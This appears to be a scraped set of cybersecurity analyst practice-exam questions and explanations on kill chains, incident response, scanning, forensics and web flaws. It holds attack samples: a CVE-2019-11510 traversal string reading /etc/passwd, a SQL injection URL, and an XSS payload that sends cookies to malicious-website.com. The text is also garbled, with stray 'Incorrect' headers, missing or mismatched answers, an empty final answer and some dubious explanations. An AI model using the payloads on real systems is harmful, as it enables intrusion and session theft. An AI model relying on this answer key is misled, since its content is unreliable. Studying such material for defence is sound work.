Udemy Exam 1

Question 1

In the infamous Equifax data breach, which phase of the Cyber Kill Chain was represented when the attackers exploited the Apache Struts vulnerability to gain access to Equifax’s system?

Answer 1

The exploitation of the Apache Struts vulnerability to gain access to Equifax’s system represents the Exploitation phase of the Cyber Kill Chain. Reconnaissance is about gathering information about the target system, not executing a payload. Weaponization is the phase where the payload is created. Actions and Objectives is when the attacker fulfills their intent, not exploiting a vulnerability.

Question 2

In the context of incident response, why is the metric ‘Mean Time to Remediate’ important?

Answer 2

The ‘Mean Time to Remediate’ metric provides an indication of how efficiently an organization can respond to and resolve security incidents, which is vital for evaluating and improving incident response capabilities.

Question 3

A data breach has occurred in your company. It is determined that customer information was compromised, leading to a loss of trust among your client base. What type of communication would be most suitable to manage this crisis?

Answer 3

While important in its own right, legal communication primarily deals with the legal aspects of the incident and isn’t directly concerned with managing customer relationships.

Question 4

You are conducting a review of a VPN device’s logs and found the following URL being accessed:

https://sslvpn/dana-na/../diontraining/html5acc/teach/../../../../../../etc/passwd?/diontraining/html5acc/teach/

Based upon this log entry alone, which of the following most likely occurred?

Answer 4

The exact string used here was the attack string used in CVE-2019-11510 to compromise thousands of VPN servers worldwide using a directory traversal approach. However, its presence in the logs does not prove that the attack was successful, only that it was attempted. To verify that the attacker successfully downloaded the/etc/passwd file, a cybersecurity analyst would require additional information and correlation. If the server utilizes proper input validation on URL entries, then the directory traversal would be prevented. As no SQL or XML language elements are present, this is definitely not an SQL or XML injection attack

Question 5

Which of the following will an adversary so during the exploitation phase of the Lockheed Martin kill chain? (SELECT THREE)

A backdoor/implant is placed on a victim’s client

Wait for a user to click on a malicious link

Select backdoor implant and appropriate command and control infrastructure for operation

Take advantage of a software, hardware, or human vulnerability

A webshell is installed on a web server

Wait for a malicious email attachment to be opened

Answer 5

During this phase, activities taken during the exploitation phase are conducted against the target’s system. Taking advantage of or exploiting an accessible vulnerability, waiting for a malicious email attached to be opened, or waiting for a user to click on a malicious link is all part of the exploitation phase. The installation of a web shell, backdoor, or implant is all performed during the installation phase. Selecting a backdoor implant and appropriate command and control infrastructure occurs during the weaponization phase.

Question 6

Which of the following are valid concerns when migrating to a serverless architecture? (SELECT THREE)

Dependency on the cloud service provider

Limited disaster recovery options

Protection of endpoint security

Management of VPC offerings

Patching of the backend infrastructure

Management of physical servers

Answer 6

Serverless is a modern design pattern for service delivery. With serverless, all the architecture is hosted within a cloud, but unlike “traditional” virtual private cloud (VPC) offerings, services such as authentication, web applications, and communications aren’t developed and managed as applications running on servers located within the cloud. Instead, the applications are developed as functions and microservices, each interacting with other functions to facilitate client requests. There is a heavy dependency on the cloud service provider in a serverless architecture system since all of the back-end infrastructure’s patching and management functions are done by them. An organization using such an architecture would still need to prevent compromise of the user endpoints, though the cloud service provider does not manage these. Another concern with serverless architectures is that there are limited options for disaster recovery if service provisioning fails. Patching of backend infrastructure is eliminated because the infrastructure is eliminated with serverless architectures. Once migration is complete, there are no physical servers to manage, which reduces the workload on your system administration teams.

Question 7

Which of the following techniques would best mitigate malware that utilizes a fast flux network for its command and control infrastructure?

Utilize a secure recursive DNS resolver to a third-party secure DNS resolver

Blacklisting known malicious domain names

Blacklisting known malicious IP addresses

Conduct detailed statistical analysis of the structure of domain names to detect anomalies

Answer 7

Third-party DNS resolvers, particularly those of ISPs, will typically have elaborate algorithms designed to detect command and control (C2) via fast flux networks. Fast flux DNS utilizes a technique that rapidly changes the IP address associated with a domain to allow an adversary to defeat IP-based blacklists. Often, these fast flux networks have communication patterns that might be detectable, though. While in-house statistical analysis might be possible (and could be done in parallel), the commercial resources available to a large scale ISP or dedicated secure DNS providers will be better tailored to combatting this issue.

Question 8

A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation?

Memorandum of understanding

Service level agreement

Rules of engagement

Acceptable use policy

Answer 8

While the contract documents’ network scope will define what will be tested, the rules of engagement define how that testing is to occur. Rules of engagement can state things like no social engineering is allowed, no external website scanning, etc. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve monetary exchange. A service level agreement contains the operating procedures and standards for a service contract. An acceptable use policy is a policy that governs employees’ use of company equipment and internet services.

Question 9

cybersecurity analyst is analyzing an employee’s workstation that is acting abnormally. The analyst runs the netstat command and reviews the following output:

Proto Local Address Foreign Address State

TCP 0.0.0.0:53 0.0.0.0:0 LISTENING

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

TCP 0.0.0.0:445 0.0.0.0:0 LISTENING

TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING

TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT

TCP 192.168.1.4:59393 74.125.224.39:443 ESTABLISHED

TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED

TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED

TCP 192.168.1.4:59522 96.16.53.227:443 ESTABLISHED

TCP 192.168.1.4:59523 96.16.53.227:443 ESTABLISHED

TCP 192.168.1.4:53 208. 71.44.30:80 ESTABLISHED

TCP 192.168.1.4:59538 74.125.224.98:80 ESTABLISHED

TCP 192.168.1.4:59539 74.125.224.98:80 ESTABLISHED

Based on this output, which of the following entries is suspicious? (SELECT THREE)

TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT

TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED

TCP 0.0.0.0:53 0.0.0.0:0 LISTENING

TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED

Answer 9

While we cannot be certain that any malicious activity is ongoing based solely on this netstat output, the three entries concerning port 53 are suspicious and should be further investigated. Port 53 is used for DNS servers to receive requests, and an employee’s workstation running DNS would be unusual. If the Foreign Address using port 53, this would indicate the workstation was conducting a normal DNS lookup, but based on the network traffic direction, this is not the case. The entry that is listening on port 135 is not suspicious for a Windows workstation since this is used to conduct file sharing across a local Windows-based network with NetBIOS. The two entries from a random high number port to a web server (port 80 and port 443) is normal network traffic. The web server listens on a well-known or reserved port (port 80 and port 443) and then responds to the random high number port chosen by the workstation to conduct two-way communications.

Question 10

Which of the following automatically combines multiple disparate sources of information to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?

Machine learning

Deep learning

Continuous integration

Data enrichment

Answer 10

When data enrichment occurs, it could combine a threat intelligence feed with a log of NetFlow. This will allow the analyst to know if an IP address of interest is actually associated with a known APT. Machine learning and deep learning are forms of artificial intelligence that may be used to conduct data enrichment activities, but individually they are not sufficient to answer this question. Continuous integration is a software development method in which code updates are tested and committed to development or build server/code repositories rapidly, and is unrelated to this question.

Question 11

Question 14
Incorrect
Your organization is concerned about potential leaks of sensitive data. Which technology should be deployed to identify and prevent unauthorized access to such data?

DLP
Ani-virus
Encryption
Firewalls

Answer 11

Data Loss Prevention (DLP) solutions play a crucial role in protecting an organization’s sensitive information from unauthorized exposure. By identifying critical data, monitoring how it moves and is used across the network, and preventing unsanctioned access or transmission, DLP tools offer comprehensive protection against data breaches. These technologies can mitigate risks from both internal and external threats, safeguarding data whether it’s at rest, in use, or in transit. While firewalls can prevent unauthorized network access, they do not specifically identify or protect sensitive data like DLP does. Anti-virus software primarily focuses on identifying and removing malware and doesn’t offer specific protections for sensitive data like DLP. Encryption can secure data in transit or at rest but doesn’t actively identify or prevent unauthorized access to sensitive data like DLP.

Question 12

What command should a forensic analyst use to make a forensic disk image of a hard drive?

touch

dd

rm

wget

Answer 12

The dd tool is used to make bit by bit copies of a disk, drive, or partition. Once the image is created using dd, a hash of the file should be made and placed into evidence to validate the integrity of the disk image that was created. This will ensure that no modification occurs between the collection and analysis of the disk image. The wget command is a command-line utility for downloading files from the Internet. The touch command is a standard command used in the UNIX/Linux operating system used to create, change, and modify timestamps of a file. The rm command is used to delete one or more files or directories.

Question 13

Which of the following is NOT one of the main criteria included in a penetration testing plan?

Scope
Timing
Authorization
Account credentials

Answer 13

The three main criteria that should be included in a penetration testing plan are timing, scope, and authorization. Account credentials are usually provided during a white box test or vulnerability assessment, usually not provided for a penetration test.

Question 14

Which of the following is the leading cause for cross-site scripting, SQL injection, and XML injection attacks?

Answer 14

Faulty input validation

primary vector for attacking applications is to exploit faulty input validation. The input could include user data entered into a form or URL, passed by another application or link. This is heavily exploited by cross-site scripting, SQL injection, and XML injection attacks. Directory traversal is the practice of accessing a file from a location that the user is unauthorized to access. The attacker does this by ordering an application to backtrack through the directory path to read or execute a file in a parent directory. In a file inclusion attack, the attacker adds a file to a web app or website’s running process. The file is either constructed to be malicious or manipulated to serve the attacker’s malicious purposes. Cross-site scripting (XSS) is one of the most powerful input validation exploits. XSS involves a trusted site, a client browsing the trusted site, and the attacker’s site.

Question 15

Referencing the infamous WannaCry ransomware attack, where the attackers exploited a vulnerability in Microsoft’s SMB protocol using an NSA tool known as EternalBlue, which phase of the Cyber Kill Chain was the usage of EternalBlue part of?

Actions and Objectives
Command and Control
Delivery
Weaponization

Answer 15

n the context of the WannaCry ransomware attack, the NSA tool, EternalBlue, was used during the weaponization phase to exploit a known vulnerability in Microsoft’s SMB protocol. The delivery phase involves the transmission of the malicious payload to the victim, not the creation of it. Command and control refers to the phase where the attacker establishes a channel to control the compromised system. Actions and Objectives phase would be when the attackers actually encrypted the files and demanded the ransom.

Question 16

Which phase of the Cyber Kill Chain involves the attacker maintaining communication with the compromised system to facilitate data exfiltration or further exploitation?

Answer 16

The Command and Control phase of the Cyber Kill Chain involves maintaining communication with the compromised system. Weaponization involves creating a malicious payload, not maintaining communication with the compromised system. Delivery involves transmitting the weaponized payload to the victim, not maintaining communication with the compromised system. Exploitation involves taking advantage of a vulnerability in the system or application to execute the payload, not maintaining communication with the compromised system.

Question 17

Which of the following scan types are useful for probing firewall rules?

XMAS TREE
TCP SYN
TCP ACK
TCP RST

Answer 17

TCP ACK scans can be used to determine what services are allowed through a firewall. An ACK scan sends TCP packets with only the ACK bit set. Whether ports are open or closed, the target is required to respond with an RST packet. Firewalls that block the probe usually make no response or send back an ICMP destination unreachable error. This distinction allows Nmap to report whether the ACK packets are being filtered. A TCP SYN scan can sometimes be used to determine what ports are filtered. Still, if the firewall is configured to drop packets for disallowed ports instead of sending an RST packet, then a TCP SYN scan will not be able to determine if a firewall was there or if the port was simply unavailable. A target sends a TCP RST packet in response to a TCP ACK scan, but a TCP RST is not a valid type of scan itself. An XMAS Tree scan will set the FIN, PSH, and URG flags in the TCP packet. This is a noisy type of scan and not useful for probing firewall rules.

Question 18

Which of the protocols listed is NOT likely to trigger a vulnerability scan alert when used to support a virtual private network (VPN)?

Answer 18

IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN security. Due to this, PPTP and SSL for a VPN will likely alert during a vulnerability scan as an issue to be remediated.

Question 19

If an attacker can compromise an Active Directory domain by utilizing an attack to grant administrative access to the domain controllers for all domain members, which type of attack is being used?

Pass the hash
Correct answer
Golden ticket
Lateral movement
Pivoting

Answer 19

A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Pass the Hash (PtH) is the process of harvesting an account’s cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.

Question 20

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL,

http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10.

What type of attack has likely occurred?

Session hijacking
XML injection
SQL injection
Buffer overflow

Answer 20

This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique.

A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location.

A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token.

XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic.

Question 21

Which of the following protocols could be used inside a virtual system to manage and monitor the network?

EIGRP
SNMP
BGP
SMTP

Answer 21

SNMP is used to monitor and manage networks, both physical and virtual. SMTP is used for email. BGP and EIGRP are used for routing network data.

Question 22

Which of the following tools is useful for capturing Windows memory data for forensic analysis?

Memdump
dd
Wireshark
Nessus

Answer 22

The Memdump, Volatility framework, DumpIt, and EnCase are examples of Windows memory capture tools for forensic use. The dd tool is used to conduct forensic disk images. Wireshark is used for packet capture and analysis. Nessus is a commonly used vulnerability scanner.

Question 23

Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend?

Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability

Wait until next scheduled maintenance window to remediate the vulnerability

Delay the remediation until the next major update of the SQL server occurs

Remediate the vulnerability immediately

Answer 23

Jorge should recommend that emergency maintenance windows be scheduled for an off-peak time later in the day. Since the vulnerability is critical, it needs to be remediated or mitigated as quickly as possible. But, this also needs to be balanced against the business and operational needs. Therefore, we cannot simply remediate it immediately, as this would cause downtime for this public-facing server. It is also unreasonable to accept the risk until the next scheduled maintenance window since it is a critical vulnerability. Therefore, the best way to balance the risk of the vulnerability and the outage’s risk is to schedule an emergency maintenance window and patch the server during that time.

Question 24

The 2014 Heartbleed bug was a serious vulnerability in OpenSSL. Which OpenSSL version was released to fix the Heartbleed bug?

Answer 24

OpenSSL 1.0.1g

This is the version of OpenSSL that addressed the notorious Heartbleed bug, thus patching the vulnerability and securing the SSL/TLS communication.

Question 25

The management at Steven’s work is concerned about rogue devices being attached to the network. Which of the following solutions would quickly provide the most accurate information that Steve could use to identify rogue devices on a wired network?

Router and switch-based MAC address reporting

A discovery scan using a port scanner

A physical survey

Reviewing a central administration tool like a SCCM

Answer 25

The best option is MAC address reporting from a source device like a router or a switch. If the company uses a management system or inventory process to capture these addresses, then a report from one of these devices will show what is connected to the network even when they are not currently in the inventory. This information could then be used to track down rogue devices based on the physical port connected to a network device.

Question 26

Question 36
Incorrect
What describes the infrastructure needed to support the other architectural domains in the TOGAF framework?

Technical architecture
Business architecture
Your answer is incorrect
Applications architecture

Answer 26

TOGAF is a prescriptive framework that divides the enterprise architecture into four domains. Technical architecture describes the infrastructure needed to support the other architectural domains. Business architecture defines governance and organization and explains the interaction between enterprise architecture and business strategy. Applications architecture includes the applications and systems an organization deploys, the interactions between those systems, and their relation to the business processes. Data architecture provides the organization’s approach to storing and managing information assets. This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!

Question 27

When trying to thoroughly examine the security posture of a major e-commerce platform, which framework serves as an exhaustive guide dedicated explicitly to this purpose?

Diamond Model of Intrusion Analysis

OWASP Testing Guide

MITRE ATT&CK

Open Source Security Testing Methodology Manual (OSS TMM)

Answer 27

While the OSSTMM does provide a structured approach to security testing, it is more general in its application, encompassing different areas such as applications, networks, and systems, rather than focusing specifically on web applications.

Question 28

Which protective feature is used to prevent a buffer overflow attack from specific applications by randomizing where a program’s components are run from in memory?

ASLR
DLL
DLP
DEP

Answer 28

ASLR randomizes where components of a running process (such as the base executable, APIs, and the heap) are placed in memory, which makes it more difficult to conduct a buffer overflow at specific points in the address space. The Windows Data Execution Prevention (DEP) feature protects processes against exploits that try to execute code from a writable memory area (stack/heap). Windows DEP prevents code from being run from a non-executable memory region. Data loss prevention (DLP) software detects potential data breaches/data ex-filtration transmissions and prevents them by monitoring, detecting, and blocking sensitive data while in use, in motion, and at rest. A dynamic link library (DLL) is a library that contains code and data that can be used by more than one program at the same time.

Question 29

Which of the following technologies could be used to ensure that users who log in to a network are physically in the same building as the network they are attempting to authenticate on? (SELECT TWO)

Port security
GPS location
NAC
Geo-IP

Answer 29

Network Access Control is used to identify an endpoint’s characteristics when conducting network authentication. The GPS location of the device will provide the longitude and latitude of the user, which could be compared against the GPS coordinates of the building. Port security enables an administrator to configure individual switch ports to allow only a specified number of source MAC addresses ingressing the port. This would not help to locate the individual based on their location, though. Geo-IP, or geolocation and country lookup of a host-based on its IP address, would identify the country of origin of the user, but not whether they are within the building’s confines. Geo-IP is also easily tricked if the user logs in over a VPN connection.

Question 30

FISMA

Answer 30

he Federal Information Security Management Act (FISMA) is a United States federal law that defines a comprehensive framework to protect government information, operations, and assets against natural or human-made threats. FISMA requires that government agencies and other organizations that operate systems on behalf of government agencies comply with security standards. The Health Insurance Portability and Accountability Act (HIPPA) is a United States federal law designed to provide privacy standards to protect patients’ medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. The Children’s Online Privacy Protection Act (COPPA) is a United States federal law that imposes certain requirements on operators of websites or online services directed to children under 13 years of age and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age. Sarbanes–Oxley (SOX) is a United States federal law that set new or expanded requirements for all U.S. public company boards, management, and public accounting firms.

Question 31

nmap -sT

Answer 31

The nmap TCP connect scan (-sT) is used when the SYN scan

You should use the -sT flag when you do not have raw packet privileges on your workstation or if you are scanning an IPv6 network

This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using an SYN scan.

Question 32

nmap -sS

Answer 32

Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation.

Question 33

nmap -sX

Answer 33

The -sX flag would conduct a Xmas scan where the FIN, PSH, and URG flags are used in the scan.

Question 34

nmap -O

Answer 34

The -O flag would conduct an operating system detection scan of the target system.

Question 35

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URLs:

https://test.diontraining.com/profile.php?
userid=1546https://test.diontraining.com/profile.php?userid=5482

https://test.diontraining.com/profile.php?userid=3618

What type of vulnerability does this website have?

Weak or default configurations

Improper error handling
Race condition

Insecure direct object reference

Answer 35

Insecure direct object references (IDOR) are a cybersecurity issue that occurs when a web application developer uses an identifier for direct access to an internal implementation object but provides no additional access control and/or authorization checks. An attacker could change the userid number and directly access any user’s profile page in this scenario. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer. Weak or default configurations are commonly a result of incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information. Improper handling of errors can reveal implementation details that should never be revealed, such as detailed information that can provide hackers important clues on the system’s potential flaws.

Question 36

After a major ransomware attack on your organization, a comprehensive review process is initiated. This review involves dissecting the incident to identify what went wrong, what went well, and what steps can be taken to prevent such an event from happening again in the future. What is the term used for this critical part of the post-incident phase?

Tabletop exercise
Forensic analysis
Root cause analysis
Lessons learned

Answer 36

The lessons learned process involves a thorough review of an incident, with the goal of improving future incident responses by identifying what was done well and what needs to be improved. Forensic analysis is a detailed investigation of an incident to understand its origin, extent, and impact. While it can inform lessons learned, it does not itself represent the comprehensive review process aimed at improving future responses. Root cause analysis seeks to identify the origin of an incident, but does not involve a broad review of the incident response process with the aim of improving future responses. Tabletop exercises are a part of the preparation phase of the incident management lifecycle and are used to test the effectiveness of an organization’s incident response plan. They do not involve reviewing past incidents to improve future responses.

Question 37

An adversary compromises a web server in your network using a zero-day exploit and then uses it as a command and control (C2) server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illustrate?

Command and Control
Impact
Persistence
Exploitation

Answer 37

In the MITRE ATT&CK framework, Command and Control is a stage that describes how an adversary communicates with systems under their control within a target network. Exploitation is part of gaining initial access but does not describe the use of compromised systems for command and control. Persistence involves methods an adversary might use to maintain access within a network, but doesn’t represent the use of a C2 server. Impact describes the objective of the adversary, often disruptive actions like data destruction or defacement. The use of a C2 server is not an impact action.

Question 38

Which of the following security policies could help detect fraudulent cases that occur even when other security controls are already in place?

Dual control
Separation of duties
Mandatory vacations
Least privile

Answer 38

Mandatory vacation policies require employees to take time away from their job and help to detect fraud or malicious activities. Even if other controls such as separation of duties, least privilege, and dual control are used, an employee could collude with others to conduct fraud. By utilizing mandatory vacation policies, this fraud can often be discovered since a new person will be conducting the duties assigned to the person on vacation. Separation of duties is the concept of having more than one person required to complete a particular task to prevent fraud and error. Dual control, instead, requires both people to act together. For example, a nuclear missile system uses dual control and requires two people to each turn a different key simultaneously to allow for a missile launch to occur. Least privilege is the concept and practice of restricting access rights for users, accounts, and computing processes to only those resources absolutely required to perform routine, legitimate activities

Question 39

You are conducting threat hunting on your organization’s network. Every workstation on the network uses the same configuration baseline and contains a 500 GB HDD, 4 GB of RAM, and the Windows 10 Enterprise operating system. You know from previous experience that most of the workstations only use 40 GB of space on the hard drives since most users save their files on the file server instead of the local workstation. You discovered one workstation that has over 250 GB of data stored on it. Which of the following is a likely hypothesis of what is happening, and how would you verify it?

The host might be the victim of a remote access trojan – you should reimage the machine immediately

The host might use as a staging area for data exfiltration – you should conduct volume-based trend analysis on the host’s storage device

The host might be used as a command and control node for a botnet – you should immediately disconnect the host from the network

The host might be offline and conducted backups locally – you should contact a system administrator to have it analyzed

Answer 39

Based on your previous experience, you know that most workstations only store 40 GB of data. Since client workstations don’t usually need to store data locally, and you noticed that a host’s disk capacity has suddenly diminished, you believe it could indicate that it is used to stage data for exfiltration. To validate this hypothesis, you should configure monitoring and conduct volume-based trend analysis to see how much data is added over the next few hours or days. If you suspect the machine is the victim of a remote access trojan, you should not reimage it immediately. By reimaging the host, you would lose any evidence or the ability to confirm your hypothesis. Based on the scenario, you have no evidence that the system is offline or conducting backups locally. If you did suspect this, you could confirm this by checking the network connectivity or analyzing the files stored on the system. If you suspect the host used as a command and control (C2) node for a botnet, you should conduct network monitoring to validate your hypothesis before disconnecting the host from the network. If the host were a C2 node, that would not explain the excessive use of disk space observed.

Question 40

Which of the following is the correct usage of the tcpdump command to create a packet capture filter for all traffic going to and from the server located at 10.10.1.1?

tcpdump -i eth0 src 10.10.1.1

tcpdump -i eth0 host 10.10.1.1

tcpdump -i eth0 proto 10.10.1.1

tcpdump -i eth0 dst 10.10.1.1

Answer 40

Knowing tcpdump is an essential skill that will come in handy for any system administrator, network engineer, or security professional. The tcpdump tool is used to conduct packet capturing of network traffic. The host option specifies a filter to capture all traffic going to (destination) and from (source) the designated IP address. If the DST filter is used, this only captures data going to the designated IP address. If the SRC filter is used, this only captures data going from the designated IP. If the proto filter is used, this will capture all traffic going to or from a designated port, such as FTP is proto 21 was used.

Question 41

Rory is about to conduct forensics on a virtual machine. Which of the following processes should be used to ensure that all of the data is acquired forensically?

Suspend the machine and copy the contents of the directory it resides in

Perform a live acquisition of the virtual machine’s memory

Suspend the machine and make a forensic copy of the drive it resides on

Shutdown the virtual machine off and make a forensic copy of its disk image

Answer 41

The best option is to suspend the machine and copy the directory contents as long as you ensure you protect the integrity of the files by conducting a hash on them before and after copying the files. This procedure will store the virtual machine’s RAM and disk contents. Since a virtual machine stores all of its data in a single file/folder on a host’s hard drive, you can copy the entire virtual hard drive by copying the file/folder from the host operating system (such as Windows), and this will give you all the information needed for your analysis. The virtual machine should not be powered off to create a copy of the drive since it could alter the files in the virtual disk image during the shutdown process. Live acquisition relies on a specialist hardware or software tool that can capture memory contents while the computer is running. This is unnecessary for a virtual machine since suspending a virtual machine writes the entire memory contents to a file on the hard disk. Shutting down the machine is a bad idea since this runs the risk that the malware will detect the shutdown process and perform anti-forensics to remove traces of itself. While you could image the entire drive the virtual machine resides on, it is unnecessary, will take much longer, and requires you to shut down the host machine to conduct the bit-by-bit copy.

Question 42

During your annual cybersecurity awareness training in your company, the instructor states that employees should be careful about what information they post on social media. According to the instructor, if you post too much personal information on social media, such as your name, birthday, hometown, and other personal details, it is much easier for an attacker to conduct which type of attack to break your passwords?

Rainbow table attack

Birthday attack

Brute force attack

Cognitive password attack

Answer 42

A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this type of password can easily be bypassed. For example, during the 2008 elections, Vice Presidential candidate Sarah Palin’s email account was hacked because a high schooler used the “reset my password” feature on Yahoo’s email service to reset her password using the information that was publicly available about Sarah Palin (like her birthday, high school, and other such information).

Question 43

In the Mirai botnet attack, thousands of IoT devices, such as cameras and routers, were infected and used to launch large-scale DDoS attacks. In the Diamond Model of Intrusion Analysis, what do these IoT devices represent?

Capability
Infrastructure
Adversary
Victim

Answer 43

In the Diamond Model of Intrusion Analysis, the infected IoT devices used in the Mirai botnet attack represent the Infrastructure. The Adversary is the entity conducting the attack, not the resources used in the attack. The Victim is the target of the attack, not the resources used in the attack. Capability refers to the tools and techniques used in the attack, not the resources used in the attack.

Question 44

An analyst’s vulnerability scanner did not have the latest set of signatures installed. Due to this, several unpatched servers may have vulnerabilities that were undetected by their scanner. You have directed the analyst to update their vulnerability scanner with the latest signatures at least 24 hours before conducting any scans. However, the results of their scans still appear to be the same. Which of the following logical controls should you use to address this situation?

Test the vulnerability remediations in a sandbox before deploying them into production

Create a script to automatically update the signatures every 24 hours

Configure the vulnerability scanners to run in credentialed mode

Ensure the analyst manually validates that the updates are being performed as directed

Answer 44

Since the analyst appears not to be installing the latest vulnerability signatures according to your instructions, it would be best to create a script and automate the process to eliminate human error. The script will always ensure that the latest signatures are downloaded and installed in the scanner every 24 hours without any human intervention. While you may want the analyst to manually validate the updates were performed as part of their procedures, this is still error-prone and likely not to be conducted properly. Regardless of whether the scanners are being run in uncredentialed or credentialed mode, they will still miss vulnerabilities if using out-of-date signatures. Finally, the option to test the vulnerability remediations in a sandbox is a good suggestion. Still, it won’t solve this scenario since we are concerned with the scanning portion or vulnerability management and not remediation.

Question 45

You have just run the following commands on your Linux workstation:

DionTraining:~ root# ls

Names.txt

DionTraining:~ root# more Names.txt

DION

DIOn

DIon

Dion

dion

DionTraining:~ root# grep -i DION Names.txt

Which of the following options would be included as part of the output for the grep command issued? (SELECT ALL THAT APPLY)

Dion

DION

DIOn

dion

Answer 45

The grep (global search for regular expressions and print) is one of Linux’s powerful search tools. The general syntax for the grep command is “grep [options] pattern [files]. The command searches within the specified files (in this case, the Names.txt file). When the command is issued with the -i optional flag, it treats the specified pattern as case insensitive. Therefore, all uppercase and lowercase variations of the word “DION” will be presented from the file and displayed as the command output. By default, grep uses case sensitivity, so “grep DION Names.txt” would only display the output as “DION” and ignore the other variations. As a cybersecurity analyst, grep is one of your most important tools. You can use regular expressions (regex) to quickly find indicators of compromise within your log files using grep.

Question 46

An organization is conducting a cybersecurity training exercise. What team is Jason assigned to if he has been asked to monitor and manage the defenders’ and attackers’ technical environment during the exercise?

Blue team

White team

Red team

Purple team

Answer 46

Jason is assigned to the white team. The white team acts as the judges, enforces the rules of the exercise, observes the exercise, scores teams, resolves any problems that may arise, handles all requests for information or questions, and ensures that the competition runs fairly and does not cause operational problems for the defender’s mission. A red team is a group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. A blue team is a group of people responsible for defending an enterprise’s use of information systems by maintaining its security posture against a group of mock attackers. The purple team is made up of both the blue and red teams to work together to maximize their cyber capabilities through continuous feedback and knowledge transfer between attackers and defenders.

Question 47

You are conducting static analysis of an application’s source code and see the following:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

(String) page += “”;

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this code snippet, which of the following security flaws exists in this application?

Race condition
Improper input validation
Improper error handling
Insufficient logging and monitoring

Answer 47

Based on this code snippet, the application is not utilizing input validation. This would allow a malicious user to conduct an XSS (cross-site scripting) attack. For example, an attacker could input the following for a value of “ID”:
‘>document.location= ‘http://www.malicious-website.com/cgi-bin/cookie.cgi? Foo=’+document.cookie’

This could cause the victim ID to be sent to “malicious-website.com” where additional code could be run, or the session can then be hijacked. Based on the code snippet provided, we have no indications of the level of logging and monitoring being performed, nor if proper error handling is being conducted. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer.

Question 48

Question 83
Incorrect
You have been asked to conduct a forensic disk image on an internal 500 GB hard drive. You connect a write blocker to the drive and begin to image it using dd to copy the contents to an external 500 GB USB hard drive. Before completing the image, the tool reports that the imaging failed. Which of the following is most likely the reason for the image failure?

The data on the source drive was modified during the imaging

The data cannot be copied using the RAW format

The source drive is encrypted with BitLocker

There are bad sectors on the destination drive

Answer 48

If you have verified that the source and the target media are both the same size, then a failure has likely occurred due to bad media on the source drive or some bad sectors on the destination drive. The data can always be copied into a RAW format since it is a bit by bit copy and will copy even the source drive’s bad sectors. Even if the source disk were encrypted, the dd program would create a bit by bit copy to the destination drive for later cryptoanalysis attempts. Even if the data were modified, this would not cause the copy to fail. Instead, the copy would continue and record the modified data instead of the original data.

Question 49

Which operating system feature is designed to detect malware that is loaded early in the system startup process or before the operating system can load itself?

Startup Control

Master Boot Record analytics

Measured boot

Advanced anti-malware

Answer 49

